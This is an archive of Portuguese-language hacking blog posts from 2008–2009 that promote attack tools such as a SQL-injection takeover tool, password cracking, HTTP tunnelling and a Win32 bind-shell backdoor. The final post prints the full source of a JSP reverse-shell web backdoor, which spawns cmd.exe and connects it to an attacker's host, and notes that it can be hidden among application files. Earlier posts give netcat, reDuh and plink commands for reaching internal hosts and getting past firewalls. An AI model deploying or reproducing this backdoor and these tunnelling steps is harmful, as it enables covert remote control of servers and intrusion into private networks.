MySqloit – SQL Injection Takeover tool September 9, 2009
Posted by y2h4ck in General Hacking, Pentesting.Tags: Hacking, mysqloit, sql injection
add a comment
MySloit é uma tool para exploração de falhas de SQL Injection focada em LAMP(Linux, Apache, MySQL,PHP) e WAMP (Windows, Apache, MySQL,PHP). Ele tem a habilidade de fazer upload e executar shellcodes do metasploit através de falhas de MySQL SQL Injection.
Atacantes efeutando SQL Injection em MySQL-PHP podem acabar se deparando com diversas limitações ao contrário do mesmo cenário ocorrendo em um Windows com SQL Server que permite muito mais facilidades para escalar privilégios e etc. Por exemplo a falta de multiplos statements em uma query faz o MySQL uma plataforma pouco popular para remote code execution. Essa ferramenta foi escrita justamente para demonstrar como a execução remota de códigos pode ser executada em um connector de banco de dados que não suporta stack queries.
Plataforma Suportada:
1) Linux
Key Features
1) SQL Injection detection using time based injection method
2) Database fingerprint
2) Web server directory fingerprint
3) Payload creation and execution
Download: Aqui
Faça o teste e mande os resultados aqui para que eu possa postar no blog :)
Good Hacking 4 All.
L0phtCrack 6 Released May 29, 2009
Posted by y2h4ck in Ethical Hacking, General Security, Pentesting.Tags: l0p, l0pthcrack 6, lc6, password audit, password cracking, password recovery
add a comment
Bom, finalmente saiu o release da nova versão do L0pthCrack. A muitos anos esta ferramenta ficou relegada ao esquecimento (pelo menos pelos desenvolvedores) e não ouveram mais atualizações.
Entrei em contato com o suporte por e-mail e me informaram muitas coisas interessantes, que realmente fazem esta nova versão ter um plus ao ja tão conhecido e utilizado LC5.
- Possibilidade de Coletar os Hashes de hosts remotos e analisa-los;
- Algoritimos que suportam Multi-Processamento. Segundo o e-mail que recebi do suporte, o l0pthcrack agora consegue trabalhar com quantos processadores ouverem disponiveis no host que efetuará as auditorias.
Para mim estes 2 features ja foram matadores o suficiente. O melhor porém em minha opnião é o fato de agora ele gerar estatísticas muito boas sobre as quebras de senhas e também o preço pelo qual as licenças estão sendo vendidas, algo que realmente ajuda a evitar a pirataria.
Professional: $ 295
Administrator: $ 595
Consultant: $ 11195
A diferença da licença Professional para a Administrator é que na versão Administrator é possível utilizar Pre-computed Hash Tables (Rainbow Tables) e gera-las.
Da administrator para a Consultant é a possibilidade de instalar o LC6 em até 6 hosts.
Existe tambem a possibilidade de se atualizar da versão 5 para a 6 por apenas 25% do valor da licença. Basta enviar os dados de sua licença por e-mail para que possa ser avaliada a possibilidade do upgrade. Obviamente a licença deve ser original :P
Existe uma versão de demonstração que pode ser baixada Aqui.
Ja providenciei a minha cópia do LC6 >:D
Good Hacking 4 All.
PHP filesystem attack vectors February 12, 2009
Posted by y2h4ck in General Hacking, Web Hacking.Tags: Hacking, Pentest, php attacks, security
add a comment
Olá pessoal, após um pequeno periodo de “férias” estou de volta postando algumas coisas interessantes que estão rolando por ai. Um texto que li estes dias que realmente me chamou a atenção foi o paper do Ushi Team falando sobre vetores de ataques ao filesystem utilizando PHP.
Um dos fatores mais interessantes é que um dos ataques demonstrados no paper refere-se ao uso do patch Suhoshin, justamente criado para delimitar ataques em códigos PHP, atuando como uma espécie de filtro de chamadas perigosas.
Uma leitura que realmente vale a pena.
ClickJacking + XSS = YouR PwneD January 6, 2009
Posted by y2h4ck in General Hacking, Web Hacking.Tags: clickjacking, Hacking, Web Hacking, xss
add a comment
No artigo a seguir postado pelo Nex (http://nex.playhack.net) é comentada a possibilidade de mesclar ataques de ClickJacking junto com XSS, aumentando consideravelmente o escopo de ação deste tão comentado ataque.
Link Aqui
reDuh: TCP Tunnel through HTTP Requests November 28, 2008
Posted by y2h4ck in General Hacking, Pentesting, Web Hacking.Tags: asp tunnel, Hacking, http tunnel, jsp tunnel, php tunnel, reDuh, tcp redirects, Web Hacking
add a comment
Muitas vezes, durante um pentest, são encontradas falhas em aplicações web que permitem que seja feito o upload de arquivos para o servidor web. Nesta hora, apesar da falha não proporcionar um acesso administrativo direto, ela fornece um canal muito rico em possibilidades. Uma destas possibilidades que iremos tratar hoje é reDuh criado pela SensePost para HTTP Tunneling e TCP redirects.
O reDuh é atualmente uma ferramenta que pode ser utilizada para criar circuitos TCP através de requisições HTTP validadas.
Por enquanto não foi divulgada nenhuma documentação completa a respeito da ferramenta e no próprio site eles dizem que estão elaborando um .ppt demonstrativo. Porém vamos citar um exemplo simples de utilização da ferramenta.
Vamos pensar no seguinte cenário:
Digamos que você consiga exploitar uma falha qualquer ou conseguiu acesso por meio de um usuário desprotegido a um FTP do servidor web, e consegue enviar e/ou criar uma página JSP no servidor remoto.
Este usuário permitiria acesso ao Terminal Service outros servidores que estão atrás deste servidor web, e você não pode efetuar uma conexào RDP porque o firewall bloqueia todas as conexões de Inbound que chegam para estes hosts e libera apenas a porta 80.
Então nesse momento entra em ação o reDuh. Você faz o upload do arquivo reDuh.jsp para o alvo, que poderia ser o http://web001.target.com/uploads/reDuh.jsp
Feito isto agora, é necessário utilizar o reDuhClient em sua máquina apontando ele para a pagina que você acabou de fazer upload:
$ java reDuhClient web001.target.com 80 /uploads/reDuh.jsp
Você pode administrar o reDuhClient conectando na porta de gerenciamente que ele ira subir (1010 por padrão).
Uma vez conectado na console de gerenciamento do reDuhClient digite:
[createTunnel]1234:term-serv.target.com:3389
O que isto faria:
a) reDuhClient irá iniciar um socket Listen na porta 1324 e enviará uma mensagem HTTP para /uploads/reDuh.jsp que irá então abrir um socket para term-serv.target.com:3389.
b) Qualquer tráfego enviado para a o localhost socket na porta 1234 será codificado, e compactado em requests HTTP e depois enviado para o script /uploads/reDuh.jsp.
c) Qualquer tráfego vindo do servidor term-serv.target.com:3389 para o jsp é adicionado em uma query e enviado de volta para o reDuhClient quando ele requisitar.
Agora basta você iniciar o RDP Cliente de sua preferência e apontar para localhost:1234
O sistema pode gerenciar multiplas conexões, então enquanto a sessão RDP está acontecendo, nós podemos usar o manager e requisitar outros tuneis.
Neste exemplo utilizamos JsP, porém o mesmo se aplicaria caso o servidor utilizasse PHP, ASP ou JSP.
Abaixo seguem os links para Download da Ferramenta:
Download reDuhClient (the local proxy) | Download reDuhu Server Pages (JSP/PHP/ASP)
Aqui também os slides da apresentação na BlackHat 2008 onde o pessoal utilizou o reDuh como exemplo na apresentaçào sobre TCP Redirections and Tunnels.
Espero que gostem.
Good Hacking 4 All.
Curso: Web Application Hacking 29/11 November 20, 2008
Posted by y2h4ck in Ethical Hacking, General Hacking, General Security, Network Security, Pentesting, Web Hacking.Tags: curso, curso hacking, curso pentest, cursos, Pentest
add a comment
Pessoal, estou fechando uma turma agora dia 29/11. Convido a todos que tenham interesse de participar. Me enviem um email para maiores informações ou então acesssem a parte “Academy”.
Preço especial para quem citar este link.
Aguardo a todos.
Good Hacking 4 All.
Web Security Horror Stories November 14, 2008
Posted by y2h4ck in Web Hacking.Tags: Ethical Hacking, Hacker, Hacking, Web Hacking, web security, web security horror stories
add a comment
Nesta apresentação de Simon Wilison de 26 de Outubro veremos muitas vulnerabilidades em aplicações web famosas e diferentes formas de execução, assim como algumas referências históricas dessas falhas em grandes sites e corporações.
É um material bem interessante e com informações bem legais para quem está procurando algumas dicas para iniciar seus passos com estudos de Web Application Security.
Slides – On SlideShare.- web-security-horror-stories.pdf – 5.1 MB PDF file
RootSec Remote Win32 BindShell v1.0 November 5, 2008
Posted by y2h4ck in General Hacking, Pentesting.Tags: bindshell, rootsec shell, win32 backdoor, windows backdoor
add a comment
O RootSecShell é uma backdoor para sistemas Win32 criada em C++ que pode ser utilizara para criar um canal de acesso em um servidor / estação Windows ( XP / 2000 / 2003 ) utilizando o protocolo TCP.
Ao executar o bindshell a mesma abre uma Listener na porta 8080/tcp aguardando pela conexão do cliente que irá inputar os comandos desejados que serão executados no prompt do sistema com as credenciais do usuário que executou o bindshell.
Ex:
$ nc win32.lab.net 8080
hostname
C:\WINDOWS\SYSTEM32>hostname
morrowinds
at
C:\WINDOWS\SYSTEM32>at
There are no entries in the list.
net user
C:\WINDOWS\SYSTEM32>net user
User accounts for \\MORROWINDS
——————————————————————————-
__vmware_user__ Administrator Suporte
ASPNET Guest HelpAssistant
SUPPORT_388945a0
The command completed successfully.
-
Como telnet envia caracter por caracter recomendo utilizar o netcat pois ele envia os dados do comando somente quando você da o Enter.
Download aqui: RootSec Win32 BindShell v.10
Uso para o Remote BindShell: Remote win32 BindShell v1.0 + plink = Reverse Port
1-) Rode o Bindshell na maquina destino,
2-) Rode o pelink
> plink.exe -ssh -l usuario -pw senha_usuario -R 2021:127.0.0.1:8080 www.servidorssh.com.br
No servidor SSH remoto:
$ nc 127.0.0.1 2021
Enjoy uma politica de saida mal configurada de Firewall.
Thanks: Gratz para o amigo Rodrigo “Spo0ker” Montoro que deu a dica de uso do RootSec Bindshell com o plink.
Happy Hacking 4 All.
Metasploit + iPhone = iPhown October 22, 2008
Posted by y2h4ck in General Hacking, Pentesting.Tags: iphone, metasploit, metasploit iphone
2 comments
Olá pessoal, bom, como todos sabem o Metasploit hoje é uma das principais ferramentas utilizadas por muitos pentesters para efetuar testes de penetração e ganhar acesso a hosts utilizando a vasta quantidade de payloads, auxiliary tools e exploits.
Bom, outra ferramenta que tomou um lugar definitivo no coração dos afixionados por tecnologia com certeza foi o iPhone. Não tem o que dizer, é como ter um belo Unix de bolso potente e cheio de respositórios para instalar o que você quiser.
Quer um Apache + PHP ? Fácil,
Quer um Framework para desenvoler Python, Ruby, Perl ou C ?? Fácil tambem.
Usando os recursos ilimitados deste aparelho, assim como uma shellzinha bem usável, podemos transformar nosso iPhone em uma plataforma de pentest mobile e pronta para atuar em qualquer lugar que tenha uma redezinha Wireless disponível :)
Bom, antigamente o install.app era o installer oficial do iPhone, vinha com diversos repositorios que poderiam ser inclusive adicionados e contando com muitos frameworks disponiveis para instalação. Mas apareceu então o Cydia Installer. Feito a partir de um port do apt-get ele revolucionou a instalação de pacotes no iPhone e fez com que as possibilidades dobrassem !
Vamos utilizar o Cydia installer para colocar o nosso Metasploit Framework no ar. Por padrão o cydia tem um repositório chamado “Security”. La dentro tem o package do Metasploit prontinho para ser baixado e instalado. Ele tem em torno de 15 Mb pois vai baixar também todas as dependencias do Ruby/Ruby-Gem.
Quem quiser pode também optar por instalar o Ruby e depois baixar o metasploit via Wget. Fica a gosto de cada um.
Realmente funciona muito bem. Abaixo algumas imagens do iPhone rodando o metasploit framework.
Happy Hacking 4 All
JSP Reverse Shell Backdoor October 13, 2008
Posted by y2h4ck in General Hacking, Pentesting, Web Hacking.Tags: Ethical Hacking, Hacking, InputStream, Java Runtime Backdoor, JRE, jsp backdoor, OutputStream, Pentesting, Reverse Shell
add a comment
Java Server Pages (JSP) e uma forma muito popular para desenvolver aplicações web. Servidores que aplicação que suportam JSP muito conhecidos são Apache Tomcat, Weblogic e iPlanet. Neste post vamos dar uma olhada em um JSP malicioso que pode ser plantado em um servidor de aplicação Java para dar ao atacante uma shell reversa.
Entre as numerosas Classes do JRE está a java.lang.Runtime. Esta classe suporta um grande número de métodos que podem ser utilizados para executar um programa qualquer disponível no sistema alvo. Alguns destes métodos estão listados abaixo:
|
Return value |
Method name |
|
Process |
exec(String command) |
|
Process |
exec(String cmd, String[] envp) |
|
Process |
exec(String command, String[] envp, File dir) |
Observe que estes métodos executam o comando que é enviado através do parâmetro String e retorna um Process Object. Deste Process Object, é possivel obter o InputStream, OutputStream e o ErrorStream do processo executado. O resultado da execução do comando pode ser obtido através da leitura do OutputStream.
O JRE também contem um objeto Socket que pode ser usado para efetuar comunicação socket de outbound. Assim como o Process Object, o Socket Object tem InputStream e OutputStream Objects que pode ser utilizados para ler e escrever dados para o socket. Tendo em mente esta duas classes, é possivel escrever um reverse-shell backdoor cujo os passos seriam os seguintes:
1. Obter o Runtime Object,
2. Executar cmd.exe usando o Runtime Object e pegar o Process Object,
3. Criar uma conexão Socket de volta para o atacante,
4. Conectar o Socket OutStream ao Process InputStream,
5. Connectar o Socket InputStream ao Process OutputStream.
Abaixo segue o código ilustrando o exemplo citado acima:
— BOF—
// backdoor.jsp
< %@
page import=”java.lang.*, java.util.*, java.io.*, java.net.*”
% >
< %!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
% >
<h1>JSP Backdoor Reverse Shell</h1>
<form method=”post”>
IP Address
<input type=”text” name=”ipaddress” size=30>
Port
<input type=”text” name=”port” size=10>
<input type=”submit” name=”Connect” value=”Connect”>
</form>
<p>
<hr>
< %
String ipAddress = request.getParameter(“ipaddress”);
String ipPort = request.getParameter(“port”);
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec(“cmd.exe”);
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
% >
–EOF–
A imagem abaixo mostra a tela da Backdoor para que o atacante possa colocar seu host / port para a conexão reversa:
As poderosas classes que pertecem ao JRE Default dão muita flexibilidade para os desenvolvedores de Backdoors. Particularmente, o Runtime class permite a execuçào de programas externos e suporta o carregamento de DLLs ou Unix shared objects.
Se o aplicação server for comprometido, backdoors podem ser plantadas junto com os JAR files da aplicação e será muito dificil de detecta-las.
Good Hacking 4 All.
Link: Source da Backdoor pode ser baixado aqui: Backdoor.Jsp
